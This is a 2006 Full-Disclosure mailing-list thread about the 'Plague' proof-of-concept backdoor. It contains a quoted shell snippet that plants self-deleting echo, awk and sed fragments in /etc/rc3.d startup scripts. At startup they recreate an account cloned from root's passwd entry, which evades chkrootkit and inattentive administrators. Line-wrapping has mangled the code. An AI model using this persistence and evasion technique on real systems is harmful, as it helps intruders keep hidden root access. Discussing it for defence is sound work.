Re: Plague re-visited

[hijacker () oldum net]

cheers man,
i'd do the same;-)



-nik

> You always get these "i'm l33t and like to insult people" kind of goons on
> unmoderated lists.
>
> They're good for a laugh, but usually I just ignore them or if they are
> particularly odious I filter them to trash.  There's still good
> information
> to be found every now and again on this list.
>
> On 10/23/06, hijacker () oldum net <hijacker () oldum net> wrote:
> > J. Oquendo,
> > Sorry for my ever asking for clarification on plague.
> >
> > Keep the "good" work.
> >
> >
> > Maybe I will be unsubscribed by the time you read those lines, who
> > knows?
> >
> > cheers,
> > -nik
> >
> > > hijacker () oldum net wrote:
> > > > Hello Rik,
> > > > and how on earth can you make "root" run that piece of code? Do you
> > have
> > > > to specify it in the README section that it is mandatory to run that
> > as
> > > > root in order the "new" application root will be installing to run as
> > > > expected?
> > >
> > > If you need someone to spell out how this works and how it maintains
> > an
> > > account then you should unsubscribe from all security lists and search
> > > google for pokemon, change your hobby, get out of this field. From the
> > > onset nothing specified "remote root access" it stated proof of
> > concept
> > > "BACKDOOR" if you need the term defined for you, re-read the previous
> > > sentence in its entirety.
> > >
> > > > Indeed, it is hard to tell what it actually does... unless you open
> > your
> > > > eyes and see sed 's/root/something/g' somewhere.
> > >
> > > The purpose of me pondering this was a "notion" that one doesn't
> > always
> > > need to re-invent the wheel. Using standard commands, its actually
> > easier
> > > and safer to maintain a backdoor. If someone already rooted a machine,
> > how
> > > does one maintain that account without setting off bells and whistles.
> > > It's alot easier to whip up little bits and pieces and have it
> > precompile
> > > into one script, run itself, and delete itself afterwards. There would
> > be
> > > no trace of any "all inclusive" backdoor programs. A snippet here, a
> > > snippet there all precompiling either on a system startup or shutdown.
> > >
> > > > Either way, installing from hundreds of source files, can make even
> > the
> > > > best sys admin to not notice that part of the source code of the
> > > > BACKDOOR-contagious application!
> > >
> > > Really... Most system administrators don't even pay attention to log
> > > files. Most system administrators are so caught up with every work,
> > > putting out fires, configuring and maintaining systems they don't have
> > > time to check a 500gb drive for a backdoor, and when they do, they're
> > > doing what running chkrootkit. Using a method such as the one I
> > described
> > > makes it much more difficult to detect a backdoor. As for seeing the
> > word
> > > root and raising a red flag, don't make me laugh, see lines 2 and 4
> > > below... Let's start in /etc/rc3.d...
> > >
> > > echo "file=`awk 'NR==59 {gsub(/"/,"");print \$3}'
> > /usr/include/paths.h`"
> > > > >  K1firstfile
> > > echo "echo "sed -n '1p' \$file|sed 's/[^:]*:/new_account_name:/' >>
> > $file"
> > >  >>"  >>  K2nextfile
> > > echo "file2=`awk 'NR==74 {print \$8}' /usr/include/sysexits.h`" >>
> > > K3anotherfile
> > > echo "sed -n '1p' \$file2|sed 's/[^:]*:/new_account_name:/'' >>
> > $file2"
> > > >
> > > K4endingfile
> > > echo "rm $file1 $file2" >> K5lastfileremove
> > >
> > > Where one file depends on the next and so on and so forth. At the end
> > of
> > > it all the backdoor files are removed, yet on startup (or shutdown
> > > depending on how its written), files are re-compiled and the account
> > is
> > > recreated. The problem I see with many administrators and users
> > nowadays,
> > > are they're not totally clued in... So you see file=`awk 'NR==59
> > > {gsub(/"/,"");print \$3}' /usr/include/paths.h` ... Unless you have
> > > K1firstfile checksummed, most wouldn't give it a second look.
> > >
> > > > bad PLAGUE! bad intentions! bad people possibly putting that where
> > root
> > > > is
> > > > messing.
> > >
> > > I hope that comment was sarcasm and not stupidity...
> > >
> > >
> > > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
> > > J. Oquendo
> > > echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
> > > http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
> > >
> > > "How a man plays the game shows something of his
> > > character - how he loses shows all" - Mr. Luckey
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/